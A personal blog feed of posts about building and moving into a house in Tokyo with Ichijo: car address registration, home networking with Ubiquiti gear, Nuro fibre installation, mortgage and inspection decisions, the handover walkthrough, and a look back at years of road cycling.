Changing the address of the car

2025-12-27T00:00:00+00:00

We bought a second-hand minivan earlier this year and recently finished building our house in Tokyo with Ichijo. So when we moved in, we had to update the address of the car.

I have moved multiple times before, and it always involved the following steps:

Go to the city hall of the old address and register my moving-out
Go to the new city hall and register my moving-in. They update the address on the Residence Card and on the My Number Card
Go to the police station and ask them to register the new address on the Driving License (they ask to see the Residence Card to verify the new address)

The whole process takes a few hours and it’s completely free.

However this time we had a car, which added some additional steps.

At the local police station (警視庁武蔵野警察署) we had to apply for a garage certificate (車庫証明書) for the new house. This cost 2,400 yen and we could pick up the certificate 3 days after the application. In these 3 days they actually had a guy come to our house to measure the parking spot. We were just leaving at that time, so he could see that our car could fit comfortably, but he still had to measure the exact size of the lot.

After we got the garage certificate, we had to go to the nearest Motor Vehicle Inspection and Registration Office (自動車検査登録事務所) which in our case was the Tama one (多摩自動車検査登録事務所) near Tachikawa. Luckily both our old and new address falls in this office’s area, thus we could keep our original license plate (which also says Tama 多摩). If one moves between areas, then they will need to get a new license plate which would likely add cost and time to the process.

We called them ahead of time and they told us to bring the following documents:

the original Vehicle Inspection Certificate (blue paper, 自動車検査証) - the dealership recommended to keep this in the car
Resident Record showing the old and new address, without MyNumber (住民票　前住所含む　マイナンバー記載なし) - I got one from a konbini using my MyNumber card
the Garage Certificate from the police (車庫証明)

There is a form to fill out, which can be pre-filled online on this website. I did this and had to use this other website to convert my address to their numerical codes. The last step gives you a pdf to print. I made a mistake to let the printer resize the pdf to fit into the printable area, making it a few millimeters smaller. However this meant that in the office they couldn’t process it with their OCR machine, so they asked us to fill out a new form by hand.

There is another system called OSS (ワンストップサービス, One Stop Service) that is supposedly even faster, but I only saw it while we were already waiting in the office, so I didn’t use it this time.

Overall the process in the office took about half an hour. We started at the general reception, told them that we just moved, handed over the documents. The guy asked us to fill out the form again as it was slightly smaller than expected, and to pay the 350 yen for the stamp duty in a nearby building. Then we submitted the hand-filled form and the stamp, waited about 10 minutes, got sent to another building, other form to fill, then they gave us the updated Motor Vehicle Inspection Certificate Record Details (自動車検査証記録事項) and gave back the original Vehicle Inspection Certificate (自動車検査証) (which doesn’t have the address written).

I expected that the police station will be able to update the address of the car (since they can handle driving licenses), so I was a bit surprised that they sent us on this side-quest, but overall it only took a few hours incl. travel and cost less than 3,000 yen, so it wasn’t too bad.

Post-handover change: moving a spotlight to unblock a camera

2025-12-23T00:00:00+00:00

We just finished building our house in Tokyo with Ichijo and had the handover at the end of October. After moving in we found a problem: the view of one of the security camera was partially blocked by a spotlight installed right under it.

The problem

At the front of the house we added a motion activated spotlight and a security camera, with the camera on the top and the spotlight below. However both us and the architect missed that the camera is super wide angle, so the spotlight was blocking the camera’s view. Moreover at night the camera’s built-in light was reflected from the spotlight making the issue even worse.

The solution

I emailed our Ichijo contact and asked if it would be possible to move the camera to the side. I was a bit worried that they will say no, since we asked for the camera and spotlight to be in the current position, and we signed off on the designs, but I also felt that the architect should have known that the camera is wide angle (Ichijo only supports this single type of security camera from Panasonic, so it’s not like we chose something unique). In the end Ichijo fixed it for free without issues, so one more point to them for the great service.

Ichijo called us to arrange the date, and a contractor came to our house on that day. I originally asked to move the camera, but the guy said that the camera has power and ethernet, so how about moving the spotlight instead? I agreed, so he got to work and moved it within a few hours. He brought new wall-tiles with him, since the tiles often break when being removed (he told me this when I asked). Once completed, there was no sign that would indicate that it wasn’t like this originally.

I don’t know how indicative this is to the general Ichijo post-handover support, but I really liked that they fixed this issue promptly and without any back-and-forth on who’s fault it was. Experiences like this makes me want to recommend them more.

How to configure WAN1 (Ethernet #4) as LAN on a Dream Router 7

2025-11-22T00:00:00+00:00

We just built our house in Tokyo and in a recent post I wrote about how I set up our home network using Ubiquiti gear. The central piece is a Dream Router 7, which comes with two WAN ports: WAN1 (2.5 GbE RJ45) and WAN2 (10G SPF+). Our internet is connected to WAN2, and wanted to use WAN1 as a LAN port. This post is about how to configure this.

I was looking at the config options, but there is no way to re-designate or remove WAN1. Then I found this forum post which described the solution. In the end, these are the steps I went through:

Connect the router to the internet via WAN2 (10G SPF+)
Go through the setup and stay connected to the router’s network
Access the config page of the router via http://192.168.0.1. Don’t use the app, as that needs internet and we will take that away
Go to the WAN2 config and unassign the port. This will cut the internet connectivity of the router (and thus put the entire network offline). Ensure you stay connected to the network despite it not offering internet access.
Go to the WAN1 config and change the port to the SPF+ port.

Now the original WAN1 port (Ethernet #4) can be used as a LAN port.

Home network setup for our new house

2025-11-15T00:00:00+00:00

We just built our house in Tokyo and in a recent post I wrote about how we got internet. In this post I will share how I set up the network within the house.

Constraints

Ichijo houses have floor heating in all rooms. This has a heat reflective layer made of metal (looks a bit like aluminum foil), which partially blocks the radio waves. So many online blogs recommend having one WiFi access point per floor or setting up a mesh WiFi system.

We got the Nuro 10G internet package which promises up to 10 Gbps speeds. Even though this is the maximum and not guaranteed speed, I wanted to have a network that can use as much of the internet speed as available. This also helps future-proof the setup to some extent, should a faster internet connection become available.

Both my wife and I use Macbooks for work, so WiFi is preferred over wired internet for the most part.

We connected everything we could to the internet, and some of these connect via Ethernet, so these need wired connectivity.

During the design of the house

Ichijo uses Cat5e ethernet cables normally, but we asked them to use Cat6A instead for an extra 53,400 yen. Cat5e only supports speeds up to 1 Gbps, while Cat6A can do up to 10 Gbps. Ichijo also doesn’t use conduits (unless specifically requested), so upgrading these in the future is difficult, so I wanted to go with the best they could offer.

While designing the house, we could also choose the location of the information box (情報ボックス). This is where the optic fiber from Nuro ends, and where all the ethernet cables start. We asked to put the information box into my office on the second floor (between the LDK and the bathroom), which is roughly in the middle of the floor. This is how the box looked after we got the house:

Side note: the information box came with an LTE modem that Ichijo connected to the solar panel. Ichijo told me that this is used to monitor the solar panel (I can see the data in the Ichijo solar monitor app, but Ichijo also monitors the same data). I can connect this to my home network (as long as it can reach the internet), but some of their customers don’t have internet at home, so they just give this modem to everyone. The SIM has a 10 year contract, and after that they ask people to connect to their own network.

The setup

I had issues with cheap WiFi access points in the past, so I decided to get a high quality solution. Based on a friend’s recommendation, I went with Ubiquiti. They are on the higher end of home networking, but have excellent software support.

This is the design I came up with:

The fiber optics connects to the ONU, provided by Nuro (the ISP). This has a 10 Gbps Ethernet port.

Ubiquiti setups need a cloud gateway next. To simplify the setup I wanted to get one with built-in WiFi, and decided to go with the Dream Router 7 as it offered a good set of features. (I did consider having a separate WiFi AP instead, but then I run into issues with many ports only offering 1 Gbps speed, so decided to keep it within the same device.)

The Dream Router’s 10 Gbps port is however an SFP+ port and not an Ethernet one, so I had to get a converter. With this I got the 10 Gbps connection into the Dream Router.

The Dream Router only has 4 Ethernet ports, but I have 5 smart home devices and 2 home servers, so I needed more ports. To solve this I added an 8 port switch, the Lite 8 PoE. I also have all the Ethernet cables going to the bedrooms, but we won’t use all of those initially, so I decided to not connect them for now. (The switch was already pretty expensive.)

Then I needed a WiFi access point for the first floor, and went with a simple U7 Lite. This is powered via Power-over-Ethernet. The Dream Router has a port that can drive this, so connected the AP there and placed it into the middle room of the first floor. I was thinking a lot about how to fix it to the ceiling, but then decided to just use double-side tape for now. If it falls off, I will fix it properly, but it’s pretty light.

During all of this design, I kept an eye on the speed: at each connection I had to ensure that the ports on both end, and also the cable supported the speed I wanted. Since we mainly use WiFi, it also mattered what speed that can support. The latest WiFi standard is WiFi 7, however none of our device supports it yet. Still for future-proofing I wanted our setup to have it.

Overall this was my shopping list:

Model	Purpose	Price
Dream Router 7	Cloud Gateway with WiFi 7 (main router)	¥50,300
SFP+ to RJ45 Adapter	To connect the ONU to the router	¥11,700
Lite 8 PoE	8 port switch	¥18,900
U7 Lite	WiFi 7 Access Point	¥17,800

After adding a few cables, the total price was 100,743 yen. Pretty pricey, but hopefully should last a decade or so.

After setting it all up, the information box looked like this:

I will organize the cables better later, and also remove the LTE modem as I want to connect the solar to my own network in order to get the data into HomeAssistant.

Speed test

The Dream Router has a built-in functionality to do a speed test which reports 3.0-3.5 Gbps download and 1.4-2.4 Gbps upload speeds. Not exactly 10 Gbps, but still super fast.

Testing the speed on the WiFi gave me 800 Mbps down, 350 Mbps up on both floors, which is very good.

There is one potential issue: my office is next to the kitchen, and we covered that wall with a metal plate so that magnetic tools (hooks, shelves, etc.) can be attached to it. This seems to block some of the radio waves, making the WiFi slower in the LDK. If this becomes an issue, then I will need to add another WiFi AP in the living room (there is an Ethernet port behind the TV, so I can use that), and with that we will have full coverage of the second floor. But until this becomes an issue, we will use it as-is.

Update after 1 month

One month after moving this indeed became an issue: the magnetic wall is blocking some of the radio, but normally it still worked fine. However right at the edge of the magnetic wall is the microwave oven, directly in the line from the WiFi AP to the TV. Our TV itself is not smart, so we use an older Chromecast. The end result of this setup was that when the microwave was running, then Chromecast would loose connectivity and the video stream would soon stop.

I didn’t go into debugging whether it’s because the Chromecast only supports 2.4 GHz, or if it would support 5 GHz but the magnetic wall is messing with that. We had an ethernet port behind the TV anyway, so I just added one more WiFi Access Point there. Since I was already using this port for an OSMC server, I got a U7 In-Wall which offers two output Ethernet ports, letting me continue to have the OSMC on wired network.

I paid 28,360 yen for this (including a few extra cables) bringing the cost of the overall setup to 129,103 yen.

Cycling all around Japan

2025-11-14T00:00:00+00:00

I recently sold my roadbike, so it is a good time to look back on the around 10,000 km that I rode it during the last 5 years.

Buying the bike

Before coming to Japan, I used to commute to work by bicycle, so after arrival I quickly bought a simple, commuter bike. Then the pandemic hit, and I started to cycle more and more. A friend let me try his roadbike, and I was hooked. The ease of flying through the landscape made me want more of it. So I bought a roadbike, specifically a Vitus Zenium Road Bike (Tiagra) 2020, an entry-level carbon frame bike:

I ordered it from https://www.chainreactioncycles.com/, and they shipped it from the UK, so I had to pay import duties on arrival. Overall I spent around 200,000 yen:

129,999 yen for the bike
9,704 yen for shipping
20,000 yen or so for duties (I don’t remember exactly)
50,000 yen or so on clothes (padded pants, padded gloves, clip-in shoes) and accessories (lights, bell, pump, bike bags, a rinko bag to take it on trains)

First long ride: Tokyo to Nikko

My first long ride was to the historic city of Nikko. It was a 156 km long ride and took me seven and a half hours of moving time (with 10 hours from start to finish).

I really enjoyed the ride, and stayed for a few days in Nikko before heading back to Tokyo. The nearby Lake Chuzenji remains one of my favorite places of Japan.

Longest ride: Biwaichi

Lake Biwa is Japan’s biggest lake, and it has a well marked bicycle road around it. This is called Biwaichi and the local tourism organizations work hard to advertise it (the official website even has an English version). There is a bridge across the lake on the South third of the lake, so one can do the North part only (150 km) or the full circle (200 km). I did the full circle, and as I was staying in Kyoto, I had an extra 20 km to get to the lake and back.

A ride of this length takes a lot of time, so I started shortly before 6am on an April morning. After 10 hour of riding, I arrived back at 7pm.

The ride was really fun: great roads, mostly flat (since it follows the lake), beautiful scenery. But it also showed me that riding for 10 hours is very tiring and it also gets boring. There is only so many podcasts one can listen to in a day.

Longest multi-day ride: Tokyo to Kyoto in 4 days

I had a 5 day weekend, and wanted to go to Kyoto, so decided to go by bike. The Kyoto-Tokyo road was important historically, and there were multiple routes. One of them, Tokaido, follows the ocean. (This is also where the Tokaido Shinkansen goes, hence its name.) I decided to follow this route myself as well.

The distance is around 500 km, so I was planning to do it in 5 days, 100 km per day. But to keep a bit of flexibility for later days, I started with a bit more than 100. This was still during COVID, and Japan didn’t allow foreign tourists, so most hotels were empty. This let me decide in the morning how far I will go, and book the hotel for the next night.

First day I went from Tokyo to Numazu, covering 128 km. For the most part the route follows the ocean, however here I had to cross the Izu peninsula (the shinkansen has a tunnel for this). So I had to climb up to Hakone. This meant an elevation of over 1,400m during the day with a 834m long climb to Hakone. This was pretty rough. But at least I could take a photo of my bike in Hakone with the snow-covered Mt.Fuji in the background:

Second day was spent following the ocean from Numazu to Hamamatsu. 136km, riding from 7:30 to 5pm. I could even do a bit of a sightseeing in Hamamatsu (they have a castle).

Third day was from Hamamatsu to North of Nagoya, 129 km, nice views, fun ride. Leaving the ocean behind, but still mostly flat.

Since I was doing more than 100 km each day, by the fourth day I had about 140 km left. My original plan was to take it easy and split it into two days, but the weather forecast was becoming rainy for the 5ht day, so I decided to push through and went all the way to Kyoto on the last day, covering the reamining 140 km.

Overall this was the breakdown of the trip:

	Distance	Elevation	Moving time	Elapsed time	Average speed
Day 1	127.93 km	1432 m	6:48:53	8:43:31	18.8 km/h
Day 2	135.96 km	597 m	7:24:09	9:13:28	18.4 km/h
Day 3	128.84 km	625 m	7:12:24	9:33:12	17.9 km/h
Day 4	137.74 km	552 m	7:10:00	9:50:05	19.2 km/h
Overall	530.47 km	3206 m	4:35:26	13:20:16	18.6 km/h

It was a challenge, and I really enjoyed it. Although on the way back from Kyoto, I opted for the shinkansen. It was fun to do it once, but not sure if I would have enjoyed it if I had to do it again.

Craziest ride: 6 prefectures’ limited frappuchino

Starbucks frappuchinos in Japan are different from other countries’: they don’t usual contain coffee, but instead refer to a cold, sugary drink with special flavours, mostly in time-limited releases.

In 2021, Starbucks Japan was celebrating their 25th anniversary, so they created a special drink for all 47 prefectures of the country, and each was only be available in their respective prefectures. You can see each flavors on the official site: 47 JIMOTO Frappuchino.

This gave me a challenge: how many prefectures can I reach on bike in a single day to taste their special frappuchino? I designed a route that touched on 6 prefectures:

Starting in Tokyo with my morning coffee of an Origin Coffee Jelly Caramel Frappuccino® Blended Coffee
Riding over to Ibaraki for a Melon Igappe Creamy Frappuccino® Blended Cream (Ibaraki grows a lot of melons)
Going North in Chiba and picking up a Nagomi Mitarashi Coffee Frappuccino® Blended Cream (that had some sweet soy sauce in it)
Touching the corner of Saitama for a Tasaitama Strawberry & Citrus Frappuccino® Blended Juice Drink (this wasn’t even milk-based)
Reaching Gunma for a Danbe Yogurt Mango Frappuccino® Blended Cream (a fancy mango yoghurt)
Finishing the day with a Raisama Pachipachi Chocolate Frappuccino® Blended Cream in Tochigi, before catching the train back to Tokyo

Overall it still took 180 km and a full day to cover all of this. But the hardest part wasn’t the distance, or the navigation, but the fact that I drunk most of the drinks. Each of them being up to 500 kcalories of pure sugar messed with my body in a way no other bike ride did. So this ride goes to the list of things that was fun once, but I won’t do it again.

Selling the bike

Cycling became one of my main hobbies during the pandemic, and it continued afterwards. But cycling for me is mainly a sport to do alone: I like to push my limits, and that’s rarely possible in a group setting. Then after I met my now-wife, I had less empty weekends to fill with long rides, and after we had our baby, I stopped going for long rides almost entirely. Using the road bike for daily errands is also simply impractical: no basket, no kickstand, no mudguard, needs special shoes.

So after about 2 years of not using the bike at all, I felt bad that the bike was just collecting rust here, when it was made to go fast. My life changed for the better, and I enjoy spending my weekends with my family, so cycling long distances again is something that will need to wait a few years. (I’m hoping to go for cycling trips once my kids are old enough.)

So I decided to sell my road bike. I asked an online store, Bici Amore for an estimate, and they said 30,000 to 45,000 yen, depending on the condition. My wife posted it to Jimoty and someone bought it for 50,000 yen.

As I was riding it to the handover location, I remembered all the great rides I had, and I was happy to have had all these adventures.

Internet for our new house

2025-11-13T00:00:00+00:00

We just built our house in Tokyo. In this post I will cover how we got internet.

Choosing the company

I usually do a proper comparison, but for internet we had good experience with Sony Nuro in the past, so we decided to go with them. Most internet providers use the infrastructure of Docomo, but Nuro brings their own fiber optics to the homes, so it is usually faster and cheaper.

Timeline

Nuro told us that for detached houses you can apply from 2 months before the desired construction date. The construction can only happen after the house is completed and the handover is done, so we had to wait for that to be decided.

September 26: Ichijo finalized the date of the handover (about a month before the handover)
October 9: we signed up for Nuro online
October 11: Nuro confirmed our application, and asked us to reserve the date of the construction. The earliest date was one months from then (November 10). We chose November 10 afternoon.

About 2 weeks before the construction we received the ONU decide by mail to our old address (we asked them to send it there instead of the new address). We had to bring this on the day of the construction with us.

Construction

Nuro’s afternoon time-slot was 13:00-17:00, so I was waiting for them from 1pm. They arrived at 3:30pm with a boom lift truck. They used the truck to pull the fiber optic from a nearby pole to the corner of our house, where Ichijo has prepared the intake for it.

Then they pulled through the conduit to the information box, and connected the Sony ONU device (ONU = Optical Network Unit, and this device includes a router with Wifi as well). I asked if we should test the WiFi, and the guy told me that he can’t help with that; his job is to bring the optics inside, and connect it to the ONU. Once the ONU’s LINE light turns green, his job is done.

The construction finished at 4:45pm, so overall took a little bit less than 2 hours.

I tested the internet and even on ONU’s built-in WiFi I got 710 Mbps download, 650 Mbps upload speed. We signed up for the 10 Gbps plan (but that’s of course the maximum speed it might do), but the speed is still very good, especially for WiFi.

I’ve heard from two friends (one for a house, one for a mansion) that Nuro sometimes comes with not enough equipment to actually do the construction on the first time, and they need to come back a second time to complete it. It seems like we got lucky that they bought the correct size truck that could do it all on the first try.

Friend referral

Nuro has a friend referral coupon (お友達紹介クーポン) that gives discount to both you and me, so here is my referral code: MAA4604.

[edit]: I wrote about my home network setup in a separate post.

Home inspection and why we decided to skip it for our home

2025-11-03T00:00:00+00:00

Building a home is often the biggest purchase of one’s life. But most people are not experts in home construction, so to avoid being cheated by the builder, some people hire a 3rd party company to inspect the house to ensure no corners were cut during the construction.

One of my readers recommended the home inspection company さくら事務所, so I checked their website, and will use their site in this post. But other companies should be similar.

Types of inspection

There are two main types of home inspection for new houses:

continuous inspection as the house is being built (新築工事中ホームインスペクション（第三者検査）)
completion inspection (新築一戸建てホームインスペクション（完成検査・内覧会立会い）)

The former involves the inspection company visiting the construction site multiple times during the construction, and checking as the house is being built. This lets them see issues that would be hidden later (e.g. problems with the metal nets in the reinforced concrete of the foundation, or gaps in the insulation). However it needs multiple visits, so it is expensive: さくら事務所 charges between 368,500 yen and 852,500 yen (tax included).

But there is an inherent issue: during the construction the construction company manages the site, and they decide who and when can enter (even the owner can not enter unless the construction company allows). So this type of inspection needs the construction company’s collaboration, and while they likely won’t reject the idea of the inspection (as that would be very suspicious), they might reject certain inspection companies that they deem hard to work with.

This presents a conflict of interest for the inspection company: if they are too strict with their inspection, then the building company might refuse to work with them next time (and most people will just go with a different inspection company instead of switching the builder). This is especially an issue when the builder is a big company (and Ichijo builds the most custom single-family homes in the entire world), as no inspection company wants to get blacklisted by them.

Then there is another issue: especially big companies (like Ichijo) use a lot of custom and proprietary technology where they don’t want to share the details with a 3rd party company, making the inspections less useful. Meanwhile because it is a big company, they have internal rules and quality control, so the likelihood of the carpenter being hangover and messing up the insulation is much less than with a smaller company.

The completion inspection is done only when the house is done, and it is much cheaper: さくら事務所 charges between 110,000 yen to 154,000 yen for it - tax included. However since the house is already done, most of the potential major issues (foundation, insulation, structure) are already hidden, so the findings could end up being mostly cosmetic (e.g. the carpenters scratched the wallpaper).

Ichijo’s warranty

While it is clearly better to find issues before moving in, if they come up later and the builder fixes them for free, then that is not so bad. By law all builders have to offer a 10 year warranty for the structure and rain protection (e.g. roof, entrance door). They also have to take out insurance so that even if the builder goes bankrupt, the repairs are still taken care of.

Meanwhile Ichijo claims to offer a 30 year warranty so we checked the details:

The 30 year warranty covers the main structure
The roof, exterior walls, and other parts that protect from rain have a 15 year warranty that can be extended to 30 years if you perform the recommended paid work at the 15 year mark
Pluming, the water heater, and the light switches have a 5 year warranty
The entrance door and the wallpaper have a 2 year warranty

Moreover they do the following inspections and repairs:

at 10 year: free inspection, free termite prevention work, and free repair work for waterproofing if Ichijo determine that maintenance work is necessary
at 15 year: free inspection and paid repair work if Ichijo determines that waterproofing maintenance work is necessary. If it is taken (and paid for by us) or if no work is required, then the warranty gets extended to 30 years
at 20 year: free inspection, and free termite prevention work

Our decision

We decided to skip the home inspection. We were already late for the full inspection (during the construction), and I wasn’t comfortable with the conflict of interest issue there. For the final inspection it came down to this: what is the chance that there is some issue that is big enough that fixing it costs more than 100,000 yen (since that’s the price of the inspection), but not big enough for us to find it, or to be covered under the warranty? And if such issue exists, what is the chance that the inspector can find it after the entire house is completed?

We might regret this decision later, but this was our thinking.

Delay in the mortgage for our house

2025-11-02T00:00:00+00:00

We bought land in Tokyo last year and just finished building our house. We are financing both the land and the house with a mortgage, and just run into some delays with the mortgage. This won’t affect much, but it makes the interest on the bridge loan about 50,000 yen higher, and makes the mortgage of the house start later.

The bank

I covered how we chose our bank in the post about buying the land, and we had to go with the same bank for the house portion of the mortgage too. Technically the land and house portions are two separate loans with different start and end date, and potentially different options (e.g. variable vs fixed rate, or the included life insurance options). We kept both of them the same.

The amount

When buying the land we paid appr. 7% extra on top of the price of the land for the various fees, and we included that in the mortgage. (This is very common in Japan, and while it means that you start under-water on your mortgage, since the bank can come after your other assets if you default, many banks allow it.)

For the house portion of the loan we also had extra costs we wanted to include:

35.6 million yen for the house, paid to Ichijo
1.2 million yen for water connection works (our land used to be big and got split into two, and our half ended up without a connection to the water system)
2.66 million yen for the outside construction work (this is done by a company different from Ichijo and I will write about it separately)
913,000 yen for the mortgage fee (same 2.2% as with the land mortgage)
300,000 yen for registration and taxes (Ichijo’s initial estimate)
150,000 yen for bridge loan interest (Ichijo’s initial estimate)
195,950 yen for home insurance (Ichijo’s initial estimate, we ended up paying 175,633 yen

(I will post a proper breakdown on all the costs once everything is finalized.) This meant that other than the 35.6 million yen for the house, we had 5.4 million yen extra costs that we wanted to include in the loan.

During the loan pre-approval we made sure to apply for an amount that can include these. However this resulted in some surprise changes which also led to a delay in the mortgage payout for our house.

Types of loans

In my post on bridge loan I touched on this briefly (as back then I thought it was a minor thing and won’t lead to a delay), but we ended up changing the mortgage type halfway through the construction.

Ichijo-partnership mortgage

Since our bank (SMTB) and Ichijo has a partnership, initially we got the Ichijo-partnership mortgage (一条工務店との提携ローン) for the house. The only difference is the payout schedule: Ichijo wants to get paid 1/3rd in the beginning, 1/3rd in the middle, 1/3rd at the end of the construction. This partnership loan would have our bank pay 2/3rd at the middle, and 1/3rd at the end, limiting the bridge loan to 1/3rd of the amount during the first half of the construction.

For our case (house price at 35.6 million, bridge loan interest at 2.025%) this would have meant a bridge loan interest payment of about 50,000 yen.

However this type of mortgage came with a condition: the overall amount can only be up to 110% of the price of the house, so only an extra 3.56 million yen for extra costs. This would have left us with 1.8 million yen to be paid out of pocket. We could have done this, but having this included in the mortgage at less than 1% interest rate means we can invest it and make more than that. So we asked to have it included. Which made us switch to the normal mortgage

Normal mortgage

This only pays out once the house is finished and registered at the Legal Affairs Bureau (法務局) on the the real estate registry (不動産登記簿上). We were initially told that this registration will be fast (few days) but due to the Legal Affairs Bureau currently being very busy, it will take them more than 3 weeks, which delays the mortgage finalization (and payout date) as well. The bank’s explanation is that they can only give us money once they confirmed the collateral, which is when the house is recorded in the real estate registry. With the Ichijo-partnership mortgage, Ichijo acts as guarantor that the house is indeed there, but the normal mortgage needs the official registration to finish before they can use it as collateral.

On the bright side, this means that we could push back the signing of the mortgage contract to be after our official move-in date, which means the bank will handle registering our new address in the real estate registry, and we won’t have to deal with that later.

Ichijo used the bridge loan to get their final payment, so the house handover could proceed. So the only downside of this delay is that the bridge loan will be paid back a month later resulting in additional interest to be paid.

Timeline

Looking back now, maybe going with the Ichijo loan would have been better. However we didn’t know about all the delays at that time. This is how the timeline of the events looked like:

In July we got the question whether to change from the Ichijo-partnership to the normal loan. The Ichijo-partnership loan would have had a bridge loan interest of 50,000 yen.
- The delivery date was estimated to be early October. So with the normal mortgage (assuming a fast registration at the Legal Affairs Bureau), the bridge loan interest was expected to be 160,000 yen. We decided to go with this.
The construction had some delays (related to Tepco) so the completion got pushed back to end of October. This pushed the bridge loan interest to 190,000 yen (still assuming fast registration).
Then the mortgage delay caused by the Legal Affairs Bureau is pushing the bridge loan repayment back to end of November making the overall interest to 240,000 yen (bigger jump since Ichijo charged the last 1/3rd of the price to the bridge loan).

In the end was this a right decision?

From the timeline it’s clear that things changed as we went along, and the available information at the time of making the decision to switch from the Ichijo-partnership to the normal mortgage were different. But overall, was this still the right decision?

On the surface we are spending an extra 190,000 yen in bridge loan interest just to have an extra 1.8 million yen loan. However the Ichijo-partnership mortgage would have started earlier and would have incurred its own interest (0.72%). Assuming the bank would have let us delay the principal payments until the house was done, this would have meant an additional interest of about 70,000 yen (paid on the mortgage). So now the current setup is only 120,000 yen worse than the alternative.

But does the 1.8 million yen loan worth the 120,000 yen upfront cost?

At the current, 0.72% interest the 1.8 million yen will correspond to a monthly payment of 4,850 yen (=PMT(0.0072/12,35*12,-1800000)).

With the normal loan: I get 1.8 million yen today, but need to pay 120,000 yen for the bridge loan interest. So I have 1.58 million left to invest. At 5% nominal rate of return (conservative) that will become 8.7 million yen in 35 years (=1580000*1.05^35).

Meanwhile staying with Ichijo-partnership loan would mean a monthly payment that is 4,850 yen less. If I invest this money each month (with 5% average return) this will become 5.5 million yen in 35 years (=FV(0.05/12, 35*12, -4850, 0, 0)).

So switching to normal mortgage is better. But what if the interest rate on the loan rises? The BOJ has been talking about raising rates all year long. Let’s see how the final outcome changes with different interest rates:

Average interest rate*	Monthly payment on the 1.8 million yen	Future value of investing these monthly payments after 35 years
0.72%	4,850 yen	5,509,650 yen
2%	5,963 yen	6,774,212 yen
3%	6,927 yen	7,870,057 yen
3.72%	7,670 yen	8,714,372 yen
5%	9,084 yen	10,320,693 yen

*: the average interest rate is defined as the equivalent fixed rate for the whole period that would result in the same outcome.

Comparing this to the 8.7 million yen final value of the normal mortgage, it looks like as long as the average interest rate on the loan stays below 3.7% then making the switch was worth it.

One could argue that the interest going above 4% would need sustained high inflation, in which case the nominal rate of return would likely exceed 5%, so I’m pretty comfortable with the decision even with the unforeseen delays.

Receiving the keys to our new house

2025-11-01T00:00:00+00:00

Last week our house was finished, and we had the official handover (家の引き渡し) yesterday.

From Ichijo two people joined:

the sales rep, who has been acting as a project manager since our first visit to Ichijo, and will continue to be our main contact in the future, and
the construction manager, who has been overseeing the construction after the foundation was done (foundation was managed by a different person). We already met him when I went to see the main construction (done with the crane), and also when we visited the half-finished house in September

I initially though that we will confirm that the house was built per specs, and that there are no mistakes or damages, but we have 2 months to report those, so this was more about getting an explanation of all the equipment in the house.

Usually it takes 1.5-2 hours, and we took almost 2 hours (I had a lot of questions, as usual).

What we learned

I’m documenting it here also for my future self, since I will for sure forget half of this.

Bath

The self-cleaning bath tub needs the yellow マジックリーン (浴室用) and it takes 10 minutes to start the cleaning after you press the button (as it wants to make sure the bathtub is empty, so it opens the drain then waits, as it doesn’t have a sensor).

In the bath most things on the wall (including the mirror) are fixed with magnets, so they can be moved easily. We can also get more magnetic hooks or selves (e.g. Nitori has them).

The air circulation system

The 24-hour air circulation system (ロスガード) has filters that need to be cleaned:

The main unit has a filter that has to be cleaned (vacuumed) after 3 months, then replaced after another 3 months. Ichijo gave us filters for the next 10 years for this.
- They also offer stronger filters (PM2.5 type, if I remember correctly), that only need to be replaced yearly, and gave us 2 of these (they recommend them for people with hay fever, and these are sort of like samples as you can also buy them from Ichijo).
The main unit also has an insect capturing bag, right next to the main filter. This should be cleaned together with the filters. I don’t remember the replacement schedule for this, but we got only one extra, so I assume it needs to be replaced when it gets worn out.
Rooms have intakes where air comes in, and outtakes. The outtakes have filters. These need to be washed every 3 months with water.

(This blog post talks about these steps in detail.)

Apart from the set of replacement filters, we also got a big bag of leftover/extra wallpapers. They told us that wallpapers are slightly different even between different lots of the same design, so it is better to keep these for future repairs.

ロスガード also has a control panel where we can set three things:

whether to exchange heat (cool the incoming air in summer with the outgoing / heat it in winter) or not. This is generally good to keep it on.
whether to add humidity and how much to the incoming air (low, medium, high). This should be on during the winter, and off during summer. This is available because we chose the うるケア extra option that adds the humidifier.
turning it on or off, or to quiet mode (お休みモード) - this is for people that are bothered by the noise and want to turn it down/off for a short while. It turns back on after 1 hour. Ichijo highly recommends keeping the air circulation always on (so much so that it has been on ever since the house was finished)

Floor heating

The control panel can control the temperature of the water in the 4 sections we defined during the design of the house (2 on the first floor, 2 on the second). The temperature of the air is usually 5-6 degrees cooler than the water, so they recommend setting it to 25-28 degrees (depending on personal preference). There are sensors in some rooms that measure the temperature of the water, and these should not be covered.

We also checked the section of the wall where the floor heating pipes go between the first and second floor, as we should not put any screw or nail into there.

Solar panels

We checked the solar panel’s control panel. This also has a corresponding app that I have already installed and configured (the main Ichijo app prompted me to do it, and handled the authentication). Both the app and the control panel allows adjusting the mode of operation (whether to prioritize selling the electricity produced or using it) and the amount that we always want to keep in the battery (e.g. if the battery reaches 30% then stop using electricity from it). The point of this is that in case of a blackout (e.g. after a natural disaster) this setting will ensure that you always have some electricity left in the batteries to use. I asked if this was also to extend the life of the batteries, but they said no, this is just for emergencies. So I changed it to 10% (down from the default 30%), the lowest they recommended.

We also checked the breaker box: there are actually two boxes next to each other. One is the usual breaker box with breakers for individual circuits and a main breaker. The other one is for solar panel operations. This has a 3 way switch that is on the top setting in normal operations (producing electricity but also connected to the grid). If there is a blackout, the house will loose electricity until we switch this to the bottom setting (solar and battery mode). The third, middle mode is neutral (off). We actually tested this, and worked as described.

Last information on the solar panels was the billing for selling the excess electricity: Ichijo handled the contract for us with Tepco, however due to Tepco being busy, it only starts in 1-2 months. Until then we just waste the excess electricity. After that we will receive a bank transfer each months for the electricity sold. This is unrelated to the fact that we are also buying electricity from Tepco: that’s a separate contract and we could even change it to be a different company (e.g. Tokyo Gas). Unfortunately that also makes this an income and will be taxed as misc income (I need to look into how to deduct the depreciation to lower it, as misc income gets taxed at the marginal rate).

Connectivity box

Ichijo created a connectivity box (情報ボックス) in the location of our choice, so we put it into my office. This is where all ethernet cables go and where the internet fiber will come. Right now it has the ethernet cables from each room, from the LAN cameras (the Panasonic ones that Ichijo installed), from the power conditioner (providing the data on the solar panels), and from the smart breaker box (main unit of the HEMS smart home system).

The solar panel and the breaker box was already connected to a mobile modem. That’s how the app with the solar panel information is already working, even though we don’t have the internet connected yet. Ichijo pays for this for 10 years, and after that they ask customers to connect it to their own network. Our sales guy said that we can connect it earlier as well, they mainly have it as the company wants to see how the solar panels are doing and some customers don’t have internet at home.

This also brought us to the list of things that don’t yet work:

the cameras since they will need to be connected to our own network
the intercom, since the outside unit (caller) will be installed during the exterior construction
